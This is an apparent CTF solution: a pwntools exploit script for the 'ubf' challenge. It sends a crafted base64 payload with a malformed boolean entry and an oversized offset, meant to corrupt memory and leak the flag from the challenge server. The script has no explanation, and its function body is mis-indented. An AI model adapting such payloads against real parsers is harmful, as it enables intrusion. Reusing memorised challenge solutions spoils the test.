Rating:

```
from pwn import *
import base64

context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

# io = process('./ubf')
io = remote('ubf.2023.ctfcompetition.com',1337)

def p():
gdb.attach(proc.pidof(io)[0],'b fix_corrupt_booleans')

io.recvuntil('Enter UBF data base64 encoded:')
payload = p32(0x90) + 's' + p16(1) + p16(2) + p16(5) + "$FLAG"
payload += p32(0x60) + 'b' + p16(5) + p16(0xFF2E)+p8(1) + p8(0) +p8(1) +p8(0)+p8(1)
io.sendline(base64.b64encode(payload))
io.interactive()
```